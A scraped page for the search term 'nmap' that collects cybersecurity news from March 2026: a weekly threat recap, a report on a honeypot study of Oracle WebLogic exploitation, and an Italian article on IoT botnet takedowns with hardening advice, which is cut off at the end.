Search/nmap
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
npcap
Connections
16 relationships
⚡ Weekly Recap: Telecom Sleeper Cells, LLM Jailbreaks, Apple Forces U.K. Age Checks and More
Some weeks are loud. This one was quieter but not in a good way. Long-running operations are finally hitting courtrooms, old attack methods are showing up in new places, and research that stopped being theoretical right around the time defenders stopped paying attention. There's a bit of everything this week. Persistence plays, legal wins, influence ops, and at least one thing that looks boring until you see what it connects to. All of it below. Let's go. ⚡ Threat of the Week Citrix Flaw Comes Under Active Exploitation — A critical security flaw in Citrix NetScaler ADC and NetScaler Gateway (CVE-2026-3055, CVSS score: 9.3) has come under active exploitation as of March 27, 2026. The vulnerability refers to a case of insufficient input validation leading to memory overread, which an attacker could exploit to leak potentially sensitive information. Per Citrix, successful exploitation of the flaw hinges on the appliance being configured as a SAML Identity Provider (SAML IDP). Your Engineers Are Drowning in Tools — Here's the Data Chainguard surveyed 1,200 engineers and tech leaders for their 2026 Engineering Reality Report. AI is buying back time but also introducing new security concerns, while technical debt, tool sprawl, and burnout keep dragging teams down. 72% say time pressure blocks new feature work; 88% report productivity loss from too many tools. Get the Full Report ➝ 🔔 Top News FBI Confirms Hack of Director Kash Patel's Personal Email Account — The U.S. Federal Bureau of Investigation (FBI) confirmed that threat actors gained access to an email account belonging to FBI Director Kash Patel, but said no government information has been compromised. The Iran-linked hacker group Handala claimed responsibility for the hack, releasing files allegedly representing photos, emails, and classified documents taken from the FBI director's inbox. "The so-called 'impenetrable' systems of the FBI were brought to their knees within hours by our team," the hackers wrote. It's unclear when the account was hacked. The U.S. government, which recently took down multiple sites operated by Iranian state actors, said it's offering up to $10 million for information on threat groups like Parsian Afzar Rayan Borna and Handala. Parsian Afzar Rayan Borna is an IT company that's been implicated in Iran's disinformation and surveillance campaigns. The company is assessed to be linked to Banished Kitten, an Iran-nexus adversary active since at least 2008 and operates the Homeland Justice and Handala Hack personas. Red Menshen Uses Stealthy BPFDoor to Spy on Telecom Networks — A China-linked state-sponsored threat actor known as Red Menshen has deployed kernel implants and passive backdoors deep within telecommunication backbone infrastructure worldwide for long-term persistence. The implants have been fittingly described as sleeper cells that lie dormant and blend into target environments, but spring into action upon receiving a magic packet by quietly monitoring network traffic instead of opening a visible connection. Initial access is usually gained by exploiting known vulnerabilities in edge networking devices and VPN products or by leveraging compromised accounts. Once inside, the threat actor maintains long-term access by deploying tools like BPFdoor. Some BPFdoor samples mimic bare-metal infrastructure, posing as legitimate enterprise platforms to blend into operational noise. Others spoof core containerization components. By embedding the implant deep below traditional visibility layers, the goal is to significantly complicate detection efforts. Rapid7 has released a scanning script designed to detect known BPFDoor variants across Linux environments. GlassWorm Evolves to Drop Extension-Based Stealer — A new evolution of the GlassWorm campaign is delivering a multi-stage framework capable of comprehensive data theft and installing a remote access trojan (RAT), which deploys an information-stealing Google Chrome extension masquerading as an offline version of Google Docs. "It logs keystrokes, dumps cookies and session tokens, captures screenshots, and takes commands from a C2 server hidden in a Solana blockchain memo," Aikido said. GlassWorm is the moniker assigned to a persistent campaign that obtains an initial foothold through rogue packages published across npm, PyPI, GitHub, and the Open VSX marketplace. In addition, the operators are known to compromise the accounts of project maintainers to push poisoned updates. Russian Hacker Sentenced to 2 Years for TA551-Linked Ransomware Attacks — Ilya Angelov, a 40-year-old Russian national, was sentenced to two years in prison for managing a botnet that was used to launch ransomware attacks against U.S. companies. Angelov, who went by the online aliases "milan" and "okart," is said to have co-managed a Russia-based cybercriminal group known as TA551 (aka ATK236, G0127, Gold Cabin, Hive0106, Mario Kart, Monster Libra, Shathak, and UNC2420) between 2017 and 2021. The attacks leveraged spam emails to compromise systems and rope them into a botnet that other cybercriminals used to break into corporate systems and deploy ransomware. This included threat actors affiliated with BitPaymer and IcedID. FCC Bans New Foreign-Made Routers Over Security Risks — The U.S. Federal Communications Commission (FCC) said it was banning the import of new, foreign-made consumer routers, citing "unacceptable" risks to cyber and national security. To that end, all consumer-grade routers manufactured in foreign countries have been added to the Covered List, unless they have been granted a Conditional Approval by the Department of War (DoW) or the Department of Homeland Security (DHS) after determining that they do not pose any risks. The development comes as the Indian government appears to be preparing to bar Chinese CCTV product makers, such as Hikvision, Dahua, and TP-Link, from selling their cameras from April 1, 2026, to tighten oversight under the Standardisation Testing and Quality Certification (STQC) rules, the Economic Times reported. ️🔥 Trending CVEs New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week's most critical — high-severity, widely used software, or already drawing attention from the security community. Check these first, patch what applies, and don't wait on the ones marked urgent — CVE-2026-3055 (Citrix NetScaler ADC and NetScaler Gateway), CVE-2025-62843, CVE-2025-62844, CVE-2025-62845, CVE-2025-62846 (QNAP), CVE-2026-22898 (QNAP QVR Pro), CVE-2026-4673, CVE-2026-4677, CVE-2026-4674 (Google Chrome), CVE-2026-4404 (GoHarbor Harbor), CVE-2026-1995 (IDrive for Windows), CVE-2026-4681 (Windchill and FlexPLM), CVE-2025-15517, CVE-2025-15518, CVE-2025-15519, CVE-2025-15605, CVE-2025-62673 (TP-Link),CVE-2025-66176 (HikVision), CVE-2026-32647 (NGINX Open Source and NGINX Plus), CVE-2026-22765, CVE-2026-22766 (Dell Wyse Management Suite), CVE-2026-21637, CVE-2026-21710 (Node.js), CVE-2026-25185 aka LnkMeMaybe (Microsoft), CVE-2026-1519, CVE-2026-3104, CVE-2026-3119, CVE-2026-3591 (BIND 9), CVE-2026-2931 (Amelia Booking plugin), CVE-2026-33656 (EspoCRM), CVE-2026-3608 (Kea), CVE-2026-20817 (Microsoft Windows Error Reporting), CVE-2025-33244 (NVIDIA Apex), CVE-2026-32746 (Synology DiskStation Manager), and CVE-2026-3098 (Smart Slider 3 plugin). 🎥 Cybersecurity Webinars Your Identity Program Is Mature. So Why Are You Still Getting Breached? → Your identity program is mature. Yet hundreds of apps still operate outside it. New 2026 Ponemon research from 600+ security leaders shows exactly how big that gap is and what it costs. Now, AI agents are making it worse. This webinar breaks down the findings and shows you what to fix first. Everyone Agrees AI Agents Need Identity. Almost Nobody Knows How to Do It → Everyone agrees AI agents need identity. Few know how to actually do it. This session skips the theory and shows you what a real production deployment looks like, including how to give agents strong identities, see exactly what they're doing, and control how they behave. 📰 Around the Cyber World Fortinet FortiClient EMS Flaw Comes Under Attack — A recently patched security flaw affecting Fortinet FortiClient EMS has come under active exploitation in the wild as of March 24, 2026. The vulnerability in question is CVE-2026-21643 (CVSS score: 9.1), a critical SQL injection that could allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests. The issue was addressed by Fortinet last month in FortiClient EMS version 7.4.5. "Attackers can smuggle SQL statements through the 'Site'-header inside an HTTP request," Defused Cyber said. Nearly 1,000 FortiClient EMS are publicly exposed. Meta Disrupts Influence Operation Linked to Iran — Meta said it disrupted an influence operation linked to Iran that employed "sophisticated fake personas" on Instagram to build relationships with U.S. users before sending political messaging. The network used accounts posing as journalists, commentators, and ordinary people to engage users and gradually introduce political narratives. A second layer of accounts amplified posts to help spread the messaging. Armenian National Extradited to U.S. in Connection with RedLine Stealer Operations — An Armenian national has been extradited to the United States over his alleged role in the administration of the RedLine infostealer malware. Hambardzum Minasyan, per court documents, allegedly developed and managed the stealer, while unnamed conspirators maintained digital infrastructure, including the command-and-control (C2) servers and administrative panels to enable the deployment of the malware by affiliates, and collected payments from the affiliates. "They allegedly responded to questions and requests from actual and potential RedLine affiliates, conspired with each other and affiliates to steal and possess the financial information, including access devices, of victims, and laundered the proceeds of cybercrime through cryptocurrency exchanges and other means," the U.S. Justice Department said. Minasyan has also been accused of registering two virtual private servers to host portions of RedLine's infrastructure, as well as two internet domains in support of the scheme, repositories on an online file sharing site to distribute the stealer to affiliates, and registering a cryptocurrency account in November 2021 to receive payments. RedLine Stealer was disrupted in an international law enforcement operation in October 2024. Minasyan has been charged with conspiracy to commit access device fraud, conspiracy to violate the Computer Fraud and Abuse Act, and conspiracy to commit money laundering. If convicted, he faces up to 10 years in prison for access device fraud and up to 20 years in prison for the other two counts. In June 2025, the U.S. Department of State announced a $10 million reward for information on Maxim Alexandrovich Rudometov, who is believed to be the main developer and administrator of RedLine. New Android Malware "Android God Mode" Abuses Accessibility Permissions — The Indian Cybercrime Coordination Centre (I4C) has issued an advisory, alerting users of a new Android malware called Android God Mode that abuses its permissions to accessibility services to seize control of infected devices. The malware is propagated via dropper apps that masquerade as banking, public, and utility services such as SBI YONO, Jivan Parman Patra, and RTO Challan, indicating that the campaign's focus is on targeting Indian users. "By coercing users into granting elevated Android permissions, these threats achieve near-total control over the device, enabling stealthy overlay attacks and the real-time theft of sensitive financial and personal information," the I4C said. The malware is distributed in the form of links or APK files shared through WhatsApp. Once installed, it abuses Android's accessibility services to grant itself additional permissions to harvest incoming SMS messages, send messages on the victim's behalf, access contact lists, initiate fraudulent call forwarding, and take pictures using the device's camera. Android 17 Beta Gains New Security Features — To improve security against code injection attacks, Android now enforces that dynamically loaded native libraries must be read-only. If your app targets Android 17 or higher, all native files loaded using System.load() must be marked as read-only beforehand. Another new addition is the support for Post-Quantum Cryptography (PQC) through the new v3.2 APK Signature Scheme. This scheme utilizes a hybrid approach, combining a classical signature with an ML-DSA signature. China-Linked Actors Deliver Mofu Loader and KIVARS — In recent months, Chinese-affiliated espionage clusters like DRBControl have employed DLL side-loading techniques to deliver Mofu Loader – a malware previously attributed to GroundPeony – which then drops a C++ backdoor capable of executing commands issued by an attacker-controlled server. Last year, companies and organizations in Japan and Taiwan have also been targeted by variants of a backdoor called KIVARS, which is tied to a Chinese hacking group called BlackTech. Automated Traffic Outpaces Human Traffic — HUMAN Security found that automated traffic grew eight times faster than human traffic year-over-year. "In 2025, automated traffic across the internet grew 23.51% year over year, while human traffic increased 3.10% over the same period," the company said. The cybersecurity company noted that its customers experienced more than 400,000 attempted post-login account compromise attacks, more than quadruple that of 2024. U.S. Accuses China of Backing Scam Compounds — A senior U.S. official accused Beijing of implicitly backing Chinese criminal syndicates running cyber scam compounds across Southeast Asia. Speaking during a Joint Economic Committee congressional hearing about U.S. efforts to combat digital scams, Reva Price, commissioner with the U.S.-China Economic and Security Review Commission, said links have been unearthed between scam centers and the Chinese government's Belt and Road Initiative. Chinese criminal syndicates have "invested in projects linked to China's Belt and Road Initiative alongside China's state-owned enterprises," she said, adding that they "have also seen criminal leaders who appear to have gotten a pass by promoting messaging and other activities aligned with Chinese Communist Party priorities." Scam centers in Southeast Asia are often operated by Chinese crime syndicates that lure people into the region with enticing job opportunities and coerce them into participating in pig butchering or romance baiting scams by confiscating their passports and subjecting them to torture. Exploitation Against Oracle WebLogic Servers — A recently disclosed security flaw in Oracle WebLogic (CVE-2026-21962, CVSS score: 10.0) witnessed automated exploitation attempts almost immediately after public exploit code was released, demonstrating how software flaws are being rapidly weaponized by bad actors. The activity, detected by CloudSEK against its honeypots, also leveraged other WebLogic flaws (CVE-2020-14882, CVE-2020-14883, CVE-2020-2551, and CVE-2017-10271), as well as flaws impacting Hikvision and PHPUnit, indicating a spray and pray approach. "Attackers predominantly utilized rented Virtual Private Servers (VPS) from common hosting providers like DigitalOcean and HOSTGLOBAL.PLUS," the company said. "The overall activity was characterized by high-volume, automated scanning, with tools like libredtail-http and the Nmap Scripting Engine dominating the malicious traffic." Security Flaws in Cisco Catalyst 9300 Series Switches — Details have emerged about now-patched vulnerabilities in Cisco Catalyst 9300 Series switches (CVE-2026-20110, CVE-2026-20112, CVE-2026-20113, and CVE-2026-20114) that could result in privilege escalation, operational denial-of-service, stored cross-site scripting (XSS), and CRLF injection. "Collectively, these vulnerabilities introduce risks to administrative trust boundaries, service availability, session integrity, and system log reliability – affecting both operational continuity and security monitoring capabilities," OPSWAT said. "CVE-2026-20114 and CVE-2026-20110 are the most operationally impactful when chained. A low-privilege Web UI user can escalate access and invoke a maintenance-mode operation, resulting in full denial of service that may require physical intervention to restore." The issues were patched by Cisco last week. Financial Institution Targeted by BRUSHWORM and BRUSHLOGGER — A modular backdoor with USB-based spreading capabilities was used in an attack targeting an unnamed South Asian financial institution, according to findings from Elastic Security Labs. The malware, dubbed BRUSHWORM, is one of the two malware components identified in the victim's infrastructure, the other being a DLL keylogger referred to as BRUSHLOGGER. "BRUSHWORM features anti-analysis checks, AES-CBC encrypted configuration, scheduled task persistence, modular DLL payload downloading, USB worm propagation, and broad file theft targeting documents, spreadsheets, email archives, and source code," security researcher Salim Bitam said. BRUSHWORM is also responsible for running basic anti-analysis checks, maintaining persistence, command-and-control (C2) communication, and downloading additional modular payloads. BRUSHLOGGER augments the backdoor by capturing system-wide keystrokes via a simple Windows keyboard hook and logging the active window context for each keystroke session. "Neither binary employs meaningful code obfuscation, packing, or advanced anti-analysis techniques," Elastic said. "Given the absence of a kill switch, the use of free dynamic DNS servers in testing versions, and some coding mistakes, we assess with moderate confidence that the author is relatively inexperienced and may have leveraged AI code-generation tools during development without fully reviewing the output." U.K. Sanctions Xinbi — The U.K.'s Foreign, Commonwealth and Development Office (FCDO) has sanctioned Xinbi, a Chinese-language guarantee marketplace accused of enabling large-scale online fraud and human exploitation by supporting #8 Park (aka Legend Park), an industrial-scale scam compound in Cambodia notorious for large-scale pig butchering scams and forced labor of trafficked workers. The U.K. is the first country to sanction Xinbi. The move is designed to isolate Xinbi from the legitimate crypto ecosystem and disrupt its operations. Xinbi is estimated to have processed over $19.9 billion between 2021 and 2025. "The platform facilitates everything from 'Black U' money laundering and unlicensed OTC trades to the sale of compromised personal databases and scam infrastructure," Chainalysis said. "In the face of previous takedowns, Xinbi demonstrated significant resilience by rapidly migrating to the SafeW messaging app and launching its own proprietary payment app, XinbiPay. This evolution highlights the challenges around pursuing illicit services as they build custom financial rails to insulate themselves from platform-level disruptions." According to a report published by Elliptic last month, #8 Park is linked to a company named Legend Innovation, which, in turn, has ties to Prince Group, whose chairman, Chen Zhi, was arrested and extradited to China in connection with a crackdown on a large-scale fraud operation. #8 Park is also tied to HuiOne Group, with its payment business, HuiOne Pay (later rebranded as H-PAY), which operates a physical store within the compound. There has since been a sharp decline in incoming payments to merchants operating inside the compound beginning around February 9, 2026, with transactions almost entirely ceasing by February 13. What is Tsundere? — Tsundere is a botnet that enables system fingerprinting and arbitrary command execution on victim machines. It's notable for the use of a technique called EtherHiding to retrieve command-and-control (C2) servers stored in smart contracts on the Ethereum blockchain. The malware is suspected to be a Malware-as-a-Service (MaaS) offering of Russian origin, owing to logic that checks whether the infected host is located in a CIS country, including Ukraine, and terminates execution if so. Most recently, the use of the botnet has been linked to the Iranian state-sponsored actor MuddyWater. Jailbreaking, a Continued Risk to LLMs — New research from Palo Alto Networks Unit 42 has uncovered that prompt jailbreaking remains a practical risk to large language models (LLMs) and that a genetic algorithm-based fuzzing approach can be used to generate meaning-preserving prompt variants to trigger policy-violating outcomes against both closed-source and open-weight pre-trained models. "The broader implication is that guardrails should be treated as probabilistic controls that require continuous adversarial evaluation, not as definitive security boundaries," Unit 42 said. The findings reinforce that security for LLM applications cannot rely on a single layer, necessitating that organizations define and enforce application scope, use robust, multi-signal content controls, treat user input as untrusted and isolate it from privileged instructions, validate outputs against scope and policy, and monitor for misuse, and apply standard security controls, such as authentication, rate limiting, and and least privilege tool permissions. SEO Campaign Delivers AsyncRAT — Since October 2025, an unknown threat actor has been running an active SEO poisoning campaign, using impersonation sites of over 25 popular applications to direct victims to malicious installers, including VLC Media Player, OBS Studio, KMS Tools, and CrosshairX. The campaign uses ScreenConnect, a legitimate remote management tool, to establish initial access and to deliver AsyncRAT. "Most notable in this campaign is the RAT’s added cryptocurrency clipper, dynamic plugin system capable of loading arbitrary capabilities at runtime, and a geo-fencing mechanism that deliberately excludes targets across the Middle East, North Africa, and Central Asia," NCC Group said. AsyncRAT has also been delivered as part of a series of attacks on Libyan organizations between November 2025 and February 2026. The attacks targeted an oil refinery, a telecoms organization, and a state institution. "AsyncRAT is a remote access Trojan with a variety of capabilities, including keylogging, screen capture, and remote command execution capabilities, making it ideal for use in intelligence gathering and espionage attacks," Symantec and Carbon Black said. "It is also modular, meaning it can be updated and customized, which is attractive for attackers." Nigerian National Sentenced to 7 Years in Prison — A Nigerian man has been sentenced to more than seven years in a U.S. prison for his role in a scheme that broke into business email accounts and tricked victims into sending millions of dollars to fraudulent bank accounts. James Junior Aliyu, 31, received a 90-month prison sentence for conspiracy to commit wire fraud and money laundering. The court also ordered Aliyu to forfeit $1.2 million and repay nearly $2.39 million to the victims. Aliyu, who pleaded guilty in August 2025, acknowledged that he conspired with others, including Kosi Goodness Simon-Ebo, 31, and Henry Onyedikachi Echefu, 34, to deceive and defraud multiple American victims from February 2017 until at least July 2017. The business email compromise scheme targeted American businesses and individuals by compromising email accounts and sending false wiring instructions to deceive victims into sending money to bank accounts under their control. "Aliyu and his accomplices conspired to commit money laundering by disbursing the fraudulently obtained funds in the drop accounts to other accounts," the U.S. Justice Department said. "Co-conspirators moved the stolen money by initiating account transfers, withdrawing cash, and obtaining cashier’s checks. They also wrote checks to other individuals and entities to hide the true ownership and source of these assets. In total, Aliyu and his co-conspirators attempted to defraud victims of at least $10.4 million, and the victims suffered an actual loss of at least $2,389,130." Sensor Technology to Combat Deepfakes — Researchers at ETH Zürich have developed a sensor system that stamps a cryptographic signature onto images, video, and audio within a sensor chip at the exact moment they are captured, making it impossible to tamper with the data without being detected. "If the signatures are uploaded to a public ledger (e.g., a blockchain), anyone can verify the authenticity of videos and other data," ETH Zürich said. "The technology can, in principle, be integrated into any type of sensor or camera. It would then be possible to identify manipulated content on online platforms with minimal effort." Middle East Conflict Fuels Cyber Attacks — Threat actors have been capitalizing on geopolitical tensions in the Middle East region to spread Android spyware by distributing trojanized versions of Israel's Red Alert apps via SMS phishing messages. The espionage campaign has been codenamed Operation False Siren by CYFIRMA. ZIP archives containing lures related to the conflict are also being used to launch malicious payloads that lead to the deployment of PlugX and LOTUSLITE backdoors. These ZIP-based phishing campaigns have been attributed to a Chinese nation-state actor known as Mustang Panda. Elsewhere, an Iran-themed fake news blog site hosting malicious JavaScript has been found, leading to the deployment of StealC malware. Apple Tests Ways to Block Malicious Copy-Pastes in macOS — With the release of macOS 26.4 last week, Apple has introduced a new feature that warns Mac users if they paste harmful commands in the Terminal app to curb ClickFix-style attacks that have increasingly targeted macOS in recent months. "Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy," the message reads. "These instructions are commonly offered via websites, chat agents, apps, files, or a phone call." The alert comes with a "Paste Anyway" for those who wish to proceed. The disclosure comes as multiple ClickFix campaigns have come to light, including using a Cloudflare-themed verification page to deliver a Python-based macOS stealer dubbed Infiniti Stealer. A similar Cloudflare verification, but for Windows, has been used to launch PowerShell commands that ultimately drop StealC, Lumma, Rhadamanthys, Vidar Stealer, and Aura Stealer malware. The ClickFix strategy has also been adopted by a traffic distribution system known as KongTuke to redirect visitors of compromised WordPress websites to phishing pages and malware payloads. According to eSentire, ClickFix lures have been used to deliver EtherRAT, a Node.js-based backdoor linked to North Korean threat actors. "EtherRAT allows threat actors to run arbitrary commands on compromised hosts, gather extensive system information, and steal assets such as cryptocurrency wallets and cloud credentials," the Canadian security company said. "Command-and-Control (C2) addresses are retrieved using 'EtherHiding,' a technique to make C2 addresses more resilient by storing and updating them in Ethereum smart contracts, allowing threat actors to rotate infrastructure at a small cost and avoid takedowns by law enforcement." Recorded Future said it has identified five distinct clusters leveraging ClickFix to facilitate initial access to Windows and macOS systems since May 2024. "This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors," Insikt Group said. "While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS)." Apple Rolls Out Mandatory Age Verification in U.K. — In more Apple news, the tech giant has rolled out mandatory U.K. age verification with iOS 26.4, requiring users to provide a credit card or ID to confirm if they are an adult before "downloading apps, changing certain settings, or taking other actions with your Apple Account." The move comes at a time when online child safety is increasingly drawing attention from regulators, causing many digital services, including social media apps and porn sites, to roll out similar checks. Discord, which announced plans to verify the ages of all its users last month, has since paused the effort until H2 2026 after concerns were raised about how IDs and personal information would be handled. Discord has reiterated that it does not receive any identifying personal information from users who need to manually verify their age. Instead, it is partnering with third-party age verification companies, who will "handle verification and only pass back your age group." The company also said it's no longer working with age verification vendor Persona, which has attracted criticism over allegations that it shared users' data with other companies and left its frontend source code exposed to the internet. 🔧 Cybersecurity Tools OpenClaw Security Handbook → It is a detailed security guide published by ZAST AI for users of OpenClaw, a multi-channel AI gateway that connects messaging platforms, LLMs, and local system capabilities. Because that combination creates a serious attack surface, the handbook covers the real risks — prompt injection, malicious skills, exposed ports, credential theft — backed by documented incidents and CVEs, with practical configuration guidance for locking it down. VulHunt → It is an open-source framework from Binarly's research team for hunting vulnerabilities in software binaries and UEFI firmware. It uses customizable rulepacks for scanning and can connect to Binarly's Transparency Platform for large-scale triage. It also supports running as an MCP server, letting AI assistants interact with it directly. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws. Conclusion That's the week. Some of it will age well, some of it is already being quietly exploited while you're reading this sentence. The through-line, if there is one: patience. Attackers are playing long games. The detections, the arrests, the patches — they matter, but they're almost always trailing. Stay sharp, check the CVE list, and see you next Monday.
thehackernews.comMar 30, 2026extracted
Attackers Rapidly Weaponize Critical Oracle WebLogic RCE, Honeypot Study Finds
A critical Oracle WebLogic vulnerability was weaponized almost immediately after public exploit code became available, according to a new honeypot-based analysis covering attack activity between January 22 and February 3, 2026. The research focused on CVE-2026-21962, a remote code execution (RCE) flaw with a CVSS score of 10.0, and found that attackers began exploiting the vulnerability on the same day the exploit was released. The CloudSEK study, published on March 25, used a high-interaction honeypot designed to replicate a real Oracle WebLogic Server environment. Researchers recorded widespread automated scanning and exploitation attempts, confirming how quickly threat actors weaponize newly disclosed vulnerabilities. Rapid Exploitation Observed The most significant finding was the speed at which attackers adopted the CVE-2026-21962 exploit. Logs showed the first exploitation attempt occurred on January 22, the same day the exploit code was published. Additional scanning activity appeared days later as more attackers began probing internet-exposed servers. Researchers also observed ongoing exploitation attempts targeting older but still widely abused WebLogic vulnerabilities, including: CVE-2020-14882/14883 console remote code execution CVE-2020-2551 IIOP deserialization remote code execution CVE-2017-10271 WLS-WSAT deserialization remote code execution This pattern shows attackers continue to rely on a small number of well-known vulnerabilities that remain effective against unpatched systems. Automated Scanning and Broad Attacks CloudSEK confirmed that most of the observed attacks originated from rented virtual private servers hosted by common cloud providers. Activity was dominated by automated scanning tools, including libredtail-http and the Nmap Scripting Engine. The honeypot also captured numerous non-WebLogic attacks, including command injection, path traversal attempts and reconnaissance activity. Generic web reconnaissance was the most frequent activity, accounting for 967 requests from 78 unique IP addresses over the 12-day period. Mitigation and Security Recommendations The report concluded that organizations running Oracle WebLogic servers should prioritize patching and defensive controls immediately. Key recommendations include: Apply the latest Oracle security patches immediately Restrict administrative console access from the internet Disable unnecessary protocols and ports Deploy web application firewall filtering Monitor logs for suspicious activity "The data underscores the critical and immediate need for organizations to prioritize the patching of CVE-2026-21962 and implement robust layered defenses," CloudSEK warned, "including strict access control for the administrative console and WAF filtering, to mitigate the severe RCE risk posed by these unauthenticated exploits."
infosecurity-magazine.comMar 26, 2026extracted
IoT insicuro by design: le botnet smantellate dagli USA sono un sintomo, non la malattia
C’è qualcosa di profondamente inquietante nell’idea che il router Wi-Fi, anche quello usato per guardare serie TV in streaming o per far fare i compiti ai nostri figli, possa essere stato arruolato in un esercito digitale criminale a nostra insaputa. È esattamente quello che è accaduto con le botnet Aisuru, KimWolf, JackSkid e Mossad, che per fortuna sono state smantellate il 20 marzo 2026 in un’operazione internazionale coordinata che non ha precedenti per scala e complessità. Nelle quattro botnet insieme, infatti, si contavano tre milioni di dispositivi compromessi che hanno consentito tra l’altro anche di condurre attacchi DDoS che hanno raggiunto il picco di 31,4 terabit al secondo, una cifra che supera qualsiasi record precedente nel panorama delle minacce informatiche. I bersagli includevano sistemi del Dipartimento della Difesa degli Stati Uniti e infrastrutture critiche e aziende private in tutto il mondo. E, dietro a tutto questo, un modello di business sofisticato come quello del cybercrime-as-a-service in cui la capacità distruttiva veniva “noleggiata” al miglior offerente. Indice degli argomenti Secondo quanto comunicato dal Dipartimento di Giustizia degli Stati Uniti, l’operazione ha visto la partecipazione della Defense Criminal Investigative Service (DCIS) e dell’FBI sul fronte americano, del Bundeskriminalamt (BKA) e della ZAC NRW in Germania, e della Royal Canadian Mounted Police (RCMP) insieme a Ontario Provincial Police (OPP) e Sûreté du Québec (SQ) in Canada. Un’alleanza investigativa che ha portato al sequestro di domini internet e server virtuali utilizzati per il comando e controllo (C2) delle botnet, recidendo così il legame tra gli operatori criminali e i milioni di dispositivi infetti. Determinante il contributo del settore privato: dell’imponente operazione di polizia, infatti, hanno fatto parte anche una dozzina di aziende tecnologiche e organizzazioni di threat intelligence, tra cui Cloudflare, Akamai, Amazon Web Services e The Shadowserver Foundation, che hanno fornito supporto tecnico essenziale. Un elemento che merita attenzione inquanto è ormai evidente che, sempre più spesso, le grandi operazioni di contrasto al cybercrime non sarebbero possibili senza questa collaborazione pubblico-privato, a testimonianza del fatto che la sicurezza informatica è ormai una questione di ecosistema e non di singoli attori. Il meccanismo alla base di queste botnet era, nella sua essenza, alquanto semplice: trovare dispositivi IoT esposti su internet con vulnerabilità note o credenziali di default, infettarli con malware e aggregarli in una rete controllata centralmente dai server C2. Da quel momento in poi, ogni dispositivo compromesso diventava potenzialmente un’arma nelle mani degli attaccanti. Particolarmente preoccupante era la capacità dimostrata da KimWolf e JackSkid di compromettere dispositivi protetti da firewall tradizionali. Questo rappresenta un salto qualitativo significativo rispetto alle botnet di precedente generazione: non è più sufficiente posizionare un device dietro un NAT o un firewall perimetrale per ritenersi al sicuro. I criminali hanno affinato tecniche che sfruttano protocolli di rete legittimi, UPnP mal configurato o vulnerabilità nel firmware per raggiungere dispositivi teoricamente isolati. Una volta costruita la rete, gli operatori non la utilizzavano esclusivamente in proprio: la affittavano ad altri criminali attraverso un modello di cybercrime-as-a-service. I clienti pagavano per lanciare attacchi DDoS contro obiettivi specifici, spesso con finalità estorsive portate avanti con la rituale formula del “paga o la tua infrastruttura smette di funzionare”. Come riportato dagli investigatori, i danni per le vittime private hanno raggiunto decine di migliaia di dollari tra perdite dirette e costi di remediation d’emergenza. Al di là della straordinaria dimensione operativa, la vicenda delle quattro botnet smantellate dagli USA pone sul tavolo alcune questioni di carattere strutturale che, chiunque si occupi di sicurezza informatica, non può ignorare. Queste quattro botnet non sono un’anomalia, ma il sintomo di un ecosistema IoT strutturalmente fragile. Miliardi di dispositivi vengono immessi sul mercato con firmware minimale, password di default identiche per tutti gli esemplari del modello, nessun meccanismo di aggiornamento automatico e cicli di vita del prodotto che superano di gran lunga il supporto software del produttore. Quando un router da 30 euro resta in uso per 8 anni e smette di ricevere patch di sicurezza dopo 18 mesi dall’acquisto, il risultato quasi inevitabile è che diventa una risorsa per i criminali. Il volume di traffico raggiunto da queste botnet non è un numero da leggere distrattamente: per dare un’idea della scala, è sufficiente considerare che un attacco DDoS da 31,4 Tbps è sufficiente a saturare la connettività Internet di intere nazioni di medie dimensioni. Significa che anche organizzazioni con infrastrutture anti-DDoS robuste e progettate per assorbire picchi nell’ordine dei terabit, si troverebbero in seria difficoltà. Ciò significa che il settore della mitigazione DDoS dovrà necessariamente ripensare le proprie architetture di riferimento. Il fatto che tra i target figurino indirizzi IP gestiti dal Department of Defense Information Network (DoDIN) suggerisce che almeno parte di questi attacchi avesse una valenza strategica che va oltre la semplice estorsione economica. Non è possibile escludere che la capacità di queste botnet venisse utilizzata o venduta anche per finalità di disruption di infrastrutture militari e governative, con implicazioni che toccano la sicurezza nazionale. Questa operazione di law enforcement è una buona notizia, ma non risolve il problema alla radice. I dispositivi precedentemente infetti sono stati “liberati” dalla disconnessione dei server C2, ma restano vulnerabili e possono essere re-infettati in qualsiasi momento. Ecco le azioni concrete che consiglio, sia ai privati che alle organizzazioni. Cambiare subito le password di default. Router, webcam, NAS, smart TV, termostati intelligenti: qualsiasi dispositivo connesso alla rete deve avere una password univoca e robusta. Le credenziali di fabbrica sono pubblicamente note e sistematicamente sfruttate dai bot di scansione. Aggiornare il firmware. Verificare mensilmente se sono disponibili aggiornamenti per tutti i dispositivi IoT. Se un produttore non rilascia più patch, valutare la sostituzione del dispositivo o l’adozione di firmware alternativi open source (es. OpenWrt per i router). Segmentare la rete domestica. Se il router lo permette (come nella maggior parte dei modelli moderni), è utile creare una rete Wi-Fi dedicata per i dispositivi IoT, separata da quella usata per navigare con PC e smartphone. In questo modo, un dispositivo compromesso non avrà accesso diretto agli altri. Disabilitate UPnP e il port forwarding non necessario. L’Universal Plug and Play è una funzionalità conveniente ma pericolosa: permette ai dispositivi di aprire automaticamente porte sul router, facilitando l’accesso dall’esterno. Disabilitarlo se non strettamente necessario. Monitorate il traffico anomalo. Consumi di banda insolitamente elevati nelle ore notturne, rallentamenti inspiegabili della connessione: possono essere segnali di un dispositivo infetto che partecipa a un attacco. Alcuni router offrono strumenti di monitoraggio del traffico integrati. Inventario completo degli asset IoT. Non si può proteggere ciò che non si conosce. Il primo passo è un asset inventory aggiornato che includa tutti i dispositivi connessi alla rete aziendale, compresi quelli di terze parti (stampanti, sistemi di videosorveglianza, sensori industriali, dispositivi medicali). Strumenti come Nmap, Shodan Enterprise o soluzioni dedicate come Claroty e Armis possono automatizzare questa fase. Zero Trust Network Access per l’IoT. Abbandonare il modello “all’interno del perimetro ci si fida”. Ogni dispositivo IoT deve essere autenticato, autorizzato e monitorato come se fosse potenzialmente ostile. La microsegmentazione di rete con VLAN dedicate e regole di firewall granulari limita drasticamente il ragio 